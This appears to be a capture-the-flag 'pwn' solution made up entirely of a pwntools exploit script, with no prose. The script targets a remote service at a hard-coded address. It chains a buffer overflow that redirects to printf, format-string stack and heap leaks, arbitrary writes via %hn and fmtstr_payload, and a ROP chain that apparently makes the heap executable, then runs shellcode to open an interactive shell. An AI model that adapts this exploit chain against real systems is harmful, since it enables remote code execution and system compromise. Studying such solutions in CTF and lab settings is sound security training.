Tags: pwn
Rating: 1.0
```
from pwn import *
context.arch = 'amd64'
p = remote('168.119.108.148', 10010)
printf = 0x410EE0
payload = b'faq'*158 + b'a'*4 + p64(printf)
p.sendlineafter('text:', payload)
payload = b'%12$p'
p.sendlineafter('text:', payload)
stack_leak = int(p.recvline(), 16)
vector_ptr = stack_leak - 0x140
info(hex(stack_leak))
info(hex(vector_ptr))
payload = b'%7$p'
p.sendlineafter('text:', payload)
heap_leak = int(p.recvline(), 16)
heap_base = heap_leak - 0x2bf0
info(hex(heap_leak))
info(hex(heap_base))
p.sendlineafter('text:', f'%{vector_ptr & 0xffff}c%12$hn')
payload = b'%47$hhn'
payload = payload.ljust(0x100, b'a')
payload += asm(shellcraft.sh())
payload = payload.ljust(0xf90, b'a')
payload += p64(printf) + p64(vector_ptr + 8) + p64(0x200)
p.sendlineafter('text:', payload)
payload = fmtstr_payload(8, {0x4C9098: 0x42A0E5})
p.sendlineafter('text:', payload)
pop_rdi = 0x00000000004018da
pop_rsi = 0x0000000000404cfe
pop_rdx = 0x00000000004017df
ret = pop_rdi + 1
payload = p64(0)
payload += p64(pop_rdi)
payload += p64((heap_leak - 0x1000) & ~0xfff)
payload += p64(pop_rsi)
payload += p64(0x21000)
payload += p64(pop_rdx)
payload += p64(0x7)
payload += p64(0x45AC90)
payload += p64(heap_leak - 0xf10)
p.sendlineafter('text:', payload)
p.sendline()
p.interactive()
```
